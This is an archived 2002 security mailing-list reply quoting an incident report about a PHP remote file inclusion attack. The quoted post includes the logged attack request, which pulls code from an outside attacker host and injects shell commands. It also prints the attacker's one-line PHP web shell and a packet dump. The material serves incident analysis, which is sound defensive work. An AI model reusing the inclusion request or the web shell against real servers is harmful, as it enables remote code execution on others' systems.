Re: Good practicle php attack example

From: Harald Finnaas (mailingsat_private)
Date: Tue Sep 17 2002 - 22:17:19 PDT

Next message: Kurt Seifried: "Re: What's on udp/2002 ?"

Previous message: Matthew S Barnes: "Thank you all for your responses to "Huge Autoexec.bat""
In reply to: zeno: "Good practicle php attack example"
Next in thread: Steven M. Christey: "Re: Good practicle php attack example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

I noticed the same attack 9/16. It orginated from 200.165.31.202.

Regards,
Harald

----- Original Message -----
From: "zeno" <bugtraqat_private>
To: <webppsecat_private>
Cc: <incidentsat_private>
Sent: Tuesday, September 17, 2002 8:12 PM
Subject: Good practicle php attack example


> I figured a few people may find this interesting.
>
> 200.152.80.22 - - [14/Sep/2002:16:47:23 -0400] "GET
/index.php?file=http://www.jtecx.hpg.com.br/jtec.txt&cmd=uname%20-a;id
HTTP/1.0" 404 2656 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows 98;
Q312461)"
>
> contents of www.jtecx.hpg.com.br/jtec.txt
>
> ------------------- start snip
>
> <?php
> system($cmd);
> ?>
>
> ------------------- end snip
>
> He is attempting to include code from site B into site A and have it
execute the code locally.
> You can see he is issuing it commands via a query "&cmd=uname%20-a;id".
>
>
> Anyone else have any good examples of these types of attacks? Real life
experiences, etc...
>
>
> - zenoat_private
>
>
> FULL PACKET DUMP BELOW
>
>
>
> 0x0000: 00 A0 24 91 0E C2 00 01 97 DB C8 00 08 00 45 00  ..$...........E.
> 0x0010: 02 36 C6 13 40 00 25 06 58 54 C8 98 50 16 C7 7D  .6..@.%.XT..P..}
> 0x0020: 55 2E 08 57 00 50 BA AF F1 7E C9 CF A9 D0 50 18  U..W.P...~....P.
> 0x0030: E4 20 9A 2D 00 00 47 45 54 20 2F 69 6E 64 65 78  . .-..GET /index
> 0x0040: 2E 70 68 70 3F 66 69 6C 65 3D 68 74 74 70 3A 2F  .php?file=http:/
> 0x0050: 2F 77 77 77 2E 6A 74 65 63 78 2E 68 70 67 2E 63  /www.jtecx.hpg.c
> 0x0060: 6F 6D 2E 62 72 2F 6A 74 65 63 2E 74 78 74 26 63  om.br/jtec.txt&c
> 0x0070: 6D 64 3D 75 6E 61 6D 65 20 2D 61 3B 69 64 20 64  md=uname -a;id d
> 0x0080: 20 48 54 54 50 2F 31 2E 30 0D 0A 41 63 63 65 70   HTTP/1.0..Accep
> 0x0090: 74 3A 20 69 6D 61 67 65 2F 67 69 66 2C 20 69 6D  t: image/gif, im
> 0x00A0: 61 67 65 2F 78 2D 78 62 69 74 6D 61 70 2C 20 69  age/x-xbitmap, i
> 0x00B0: 6D 61 67 65 2F 6A 70 65 67 2C 20 69 6D 61 67 65  mage/jpeg, image
> 0x00C0: 2F 70 6A 70 65 67 2C 20 61 70 70 6C 69 63 61 74  /pjpeg, applicat
> 0x00D0: 69 6F 6E 2F 76 6E 64 2E 6D 73 2D 65 78 63 65 6C  ion/vnd.ms-excel
> 0x00E0: 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 76 6E  , application/vn
> 0x00F0: 64 2E 6D 73 2D 70 6F 77 65 72 70 6F 69 6E 74 2C  d.ms-powerpoint,
> 0x0100: 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 6D 73 77   application/msw
> 0x0110: 6F 72 64 2C 20 2A 2F 2A 0D 0A 41 63 63 65 70 74  ord, */*..Accept
> 0x0120: 2D 4C 61 6E 67 75 61 67 65 3A 20 70 74 20 2D 62  -Language: pt -b
> 0x0130: 72 0D 0A 41 63 63 65 70 74 2D 20 45 6E 63 6F 64  r..Accept- Encod
> 0x0140: 69 6E 67 3A 20 67 7A 69 70 20 2C 20 64 65 66 6C  ing: gzip , defl
> 0x0150: 61 74 65 0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A  ate..User-Agent:
> 0x0160: 20 4D 6F 7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F   Mozilla/4.0 (co
> 0x0170: 6D 70 61 74 69 62 6C 65 3B 20 4D 53 49 45 20 36  mpatible; MSIE 6
> 0x0180: 2E 30 3B 20 57 69 6E 64 6F 77 73 20 39 38 3B 20  .0; Windows 98;
> 0x0190: 51 33 31 32 34 36 31 29 0D 0A 56 69 61 3A 20 31  Q312461)..Via: 1
> 0x01A0: 2E 31 20 66 77 2D 61 73 73 2E 70 72 75 64 65 2E  .1 fw-ass.prude.
> 0x01B0: 6E 65 74 3A 38 30 38 30 20 28 53 71 75 69 64 2F  net:8080 (Squid/
> 0x01C0: 32 2E 34 2E 53 54 41 42 4C 45 36 29 0D 0A 58 2D  2.4.STABLE6)..X-
> 0x01D0: 46 6F 72 77 61 72 64 65 64 2D 46 6F 72 3A 20 32  Forwarded-For: 2
> 0x01E0: 30 30 2E 31 35 32 2E 38 33 2E 31 39 39 0D 0A 48  00.152.83.199..H
> 0x01F0: 6F 73 74 3A 20 77 77 77 2E 63 67 69 73 65 63 75  ost: www.cgisecu
> 0x0200: 72 69 74 79 2E 63 6F 6D 0D 0A 43 61 63 68 65 2D  rity.com..Cache-
> 0x0210: 43 6F 6E 74 72 6F 6C 3A 20 6D 61 78 2D 61 67 65  Control: max-age
> 0x0220: 3D 33 30 30 30 30 30 30 0D 0A 43 6F 6E 6E 65 63  =3000000..Connec
> 0x0230: 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76 65  tion: keep-alive
> 0x0240: 0D 0A 0D 0A                                      ....
>
>
>
>
> --------------------------------------------------------------------------
--
> This list is provided by the SecurityFocus ARIS analyzer service.
> For more information on this free incident handling, management
> and tracking system please see: http://aris.securityfocus.com
>
>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com

Next message: Kurt Seifried: "Re: What's on udp/2002 ?"
Previous message: Matthew S Barnes: "Thank you all for your responses to "Huge Autoexec.bat""
In reply to: zeno: "Good practicle php attack example"
Next in thread: Steven M. Christey: "Re: Good practicle php attack example"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Wed Sep 18 2002 - 16:47:59 PDT